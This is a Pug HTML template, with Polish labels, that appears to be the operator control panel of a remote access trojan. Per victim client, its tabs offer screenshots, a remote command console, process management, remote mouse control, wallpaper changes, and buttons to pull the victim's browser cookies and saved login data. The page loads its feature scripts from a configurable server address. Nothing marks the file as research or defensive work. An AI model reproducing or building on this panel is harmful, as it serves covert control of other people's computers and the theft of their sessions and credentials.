extends ../layout

block body
    div(class="uk-section")
        div(class=["uk-container", "uk-section-muted", "uk-flex", "uk-flex-column", "uk-flex-center"])
            ul( uk-tab )
                li
                    a(href="#") Zardzadaj
                li
                    a(href="#") Konsola
                li
                    a(href="#") Procesy
                li
                    a(href="#") Myszka
                li
                    a(href="#") Tapeta
                li
                    a(href="#") Ciasteczka
                li
                    a(href="#") Dane logowania
            ul(class=["uk-switcher", "uk-margin"])
                li
                    div(class=["uk-card", "uk-card-default", "uk-card-hover", "uk-margin"])
                        div(class="uk-card-header") Zrzut ekranu
                        div(class="uk-card-body")
                            div(class=["uk-flex", "uk-flex-inline"])
                                div
                                    button#screenshootFormBtn(class=["uk-button", "uk-button-primary"]) Zrzut ekranu
                                div
                                    div#screenshootSpinner(uk-spinner, style={display: 'none'})

                        div(class="uk-card-footer")
                            progress#screenshootProgressBar(class="uk-progress" value="0" max="100")
                        include ../modals/redirectToImageModal

                    div(class=["uk-card", "uk-card-default", "uk-card-hover", "uk-margin"])
                        div(class="uk-card-header") Strona
                        div(class="uk-card-body")
                            div(class="flex")
                                div(class="uk-margin")
                                    include ../forms/website_form
                        div(class="uk-card-footer")
                            progress#websiteProgressBar(class="uk-progress" value="0" max="100")
                li
                    div(class="uk-margin")
                        div(class=["uk-card", "uk-card-default", "uk-card-hover", "uk-margin", ])
                            div(class="uk-card-header") Konsola
                                div#commandResult(class="uk-card-body", style={height: '250px', overflow: 'auto'})
                            div(class="uk-card-footer")
                                include ../forms/command_form
                li
                    div(class=["uk-card", "uk-card-default", "uk-card-hover", "uk-margin"])
                        div(class="uk-card-header") Zarzadzaj procesami
                            div(class="uk-card-body")
                                div(class="uk-flex")
                                    div(class="uk-margin")
                                        include ../forms/process_form
                                div(class=["uk-flex"])
                                    div(class="uk-overflow-auto")
                                        table#processTable(class=["uk-table", "uk-table-striped", "uk-table-middle", "uk-table-large"], style={display: "none"})
                                            thead
                                                tr
                                                    th Title
                                                    th Process Name
                                                    th Process Id
                                                    th Opcje
                                            tbody#processList
                                            span#processSpinner(uk-spinner)
                li
                    div(class=["uk-card", "uk-card-default", "uk-card-hover", "uk-margin"])
                        div(class="uk-card-header") Zarzadzaj myszka
                            div(class="uk-card-body")
                                div(class=["uk-flex", "uk-flex-column"])
                                    div(class=["uk-flex-inline", "uk-flex-center"])
                                        div(class="uk-margin")
                                            button#mouseManageBtnUp(class=["uk-button", "uk-button-primary"])
                                                span(uk-icon={icon: "arrow-up"})
                                            button#mouseManageBtnDown(class=["uk-button", "uk-button-primary"])
                                                span(uk-icon={icon: "arrow-down"})
                                            button#mouseManageBtnLeft(class=["uk-button", "uk-button-primary"])
                                                span(uk-icon={icon: "arrow-left"})
                                            button#mouseManageBtnRight(class=["uk-button", "uk-button-primary"])
                                                span(uk-icon={icon: "arrow-right"})
                                    div(class=["uk-flex-inline", "uk-flex-center"])
                                        div(class="uk-margin")
                                            button#mouseManageBtnClickLeft(class=["uk-button", "uk-button-primary"]) Lewy
                                            button#mouseManageBtnClickRight(class=["uk-button", "uk-button-primary"]) Prawy
                                            button#mouseManageBtnClickMiddle(class=["uk-button", "uk-button-primary"]) Środkowy
                li
                    div(class=["uk-card", "uk-card-default", "uk-card-hover", "uk-margin"])
                        div(class="uk-card-header") Zarządzaj tapeta
                            div(class="uk-card-body")
                                include ../forms/wallper_form
                li
                    div(class=["uk-card", "uk-card-default", "uk-card-hover", "uk-margin"])
                        div(class="uk-card-header") Pobierz ciasteczka
                            div(class="uk-card-body")
                                include ../forms/cookies_form
                            div(class="uk-card-footer")
                                progress#cookiesProgressBar(class="uk-progress" value="0" max="100")
                li
                    div(class=["uk-card", "uk-card-default", "uk-card-hover", "uk-margin"])
                        div(class="uk-card-header") Pobierz dane logowania
                            div(class="uk-card-body")
                                include ../forms/logindata_form




block append scripts
    script.
        const clientId = "#{client}"
        const address = "#{address}";
    if logged
        script(src=""+address+"/static/js/index.js")
        script(src=""+address+"/static/js/website.js")
        script(src=""+address+"/static/js/screenshot.js")
        script(src=""+address+"/static/js/command.js")
        script(src=""+address+"/static/js/mouse.js")
        script(src=""+address+"/static/js/process.js")
        script(src=""+address+"/static/js/wallper.js")
        script(src=""+address+"/static/js/cookies.js")
